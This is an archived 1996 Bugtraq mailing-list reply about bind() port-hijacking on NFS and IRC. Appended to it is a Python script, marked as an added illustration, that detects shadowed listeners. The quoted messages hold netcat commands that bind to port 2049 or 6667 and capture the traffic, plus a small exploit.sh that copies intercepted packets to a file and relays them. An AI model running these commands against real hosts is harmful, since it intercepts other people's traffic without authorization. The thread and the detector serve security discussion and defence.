Bugtraq mailing list archives

Re: BoS: bind() Security Problems
From: avalon () coombs anu edu au (Darren Reed)
Date: Mon, 5 Feb 1996 21:18:09 +1100


In some mail from invalid opcode, sie said:

Yes, but if you do this:
netcat -lvv -s 192.88.209.5 -p 2049 -e exploit.sh&

exploit.sh:
tee crap | netcat 192.88.209.5 2049

and then you can capture it all to the file: crap, and redirect it to the
original port.

A couple of things.  First, I answered the comments about IRC, not NFS.
My comments were not at all relevant to NFS (maybe I should have
deleted more text).

Second, you can prevent the above from working (see CERT Advisories on
NFS security problems) so that all that really does happen is you stop
the NFS packets reaching their real destination.  This latter bit is,
as the original poster mentioned, not able to be prevented easily on
most operating systems commercially available today.

darren.

On Thu, 1 Feb 1996, Darren Reed wrote:

In some mail from Bernd Lehle, sie said:
[...]
Exploit:
[..]
Run netcat:

w00p% nc -v -v -u -s 192.88.209.5 -p 2049
listening on [192.88.209.5] 2049 ...

To take a look at irc packets: nc -v -v -l -s Your.IP.Adress -p 6667

This won't get you messages between already connected clients and servers.

Yes, you might be able to make clients connect, at first, to you and not
a real server, but it is going to be obvious to the client: the connection
won't complete as netcat won't generate the server replies which many
clients now look for to indicate the confirmation of a connection.
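
A detection-side illustration of the issue discussed in this thread, added here as an example and not part of the original messages: it scans a listener table for ports where a specific-address bind owned by a different process sits alongside a wildcard bind, which is the condition the thread's netcat commands create on 192.88.209.5 port 2049. The `proto addr:port owner` line format, the owner names and the sample table are constructed assumptions, and the premise that the more specific bind is preferred over the wildcard one is the behaviour the thread discusses.

```python
from collections import defaultdict

WILDCARDS = {"0.0.0.0", "*", "::"}

# Constructed sample listener table (proto, local address, owner); not from the post.
SAMPLE = """\
udp 0.0.0.0:2049 nfsd(uid=0)
udp 192.88.209.5:2049 nc(uid=1001)
tcp 0.0.0.0:6667 ircd(uid=70)
tcp 0.0.0.0:25 sendmail(uid=0)
tcp 127.0.0.1:25 sendmail(uid=0)
"""

def parse_listeners(text):
    """Yield (proto, addr, port, owner) from 'proto addr:port owner' lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # skip blank or malformed lines
        proto, local, owner = parts
        addr, _, port = local.rpartition(":")
        if not port.isdigit():
            continue
        yield proto, addr, int(port), owner

def find_shadowed(text):
    """Return ports where a specific-address bind by a different owner
    coexists with a wildcard bind on the same protocol and port."""
    table = defaultdict(lambda: {"wild": set(), "specific": []})
    for proto, addr, port, owner in parse_listeners(text):
        slot = table[(proto, port)]
        if addr in WILDCARDS:
            slot["wild"].add(owner)
        else:
            slot["specific"].append((addr, owner))
    findings = []
    for (proto, port), slot in sorted(table.items()):
        for addr, owner in slot["specific"]:
            # Same owner on both binds is normal (e.g. a daemon also on loopback).
            if slot["wild"] and owner not in slot["wild"]:
                findings.append((proto, port, addr, owner, sorted(slot["wild"])))
    return findings

if __name__ == "__main__":
    for finding in find_shadowed(SAMPLE):
        print("shadowed listener:", finding)
```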




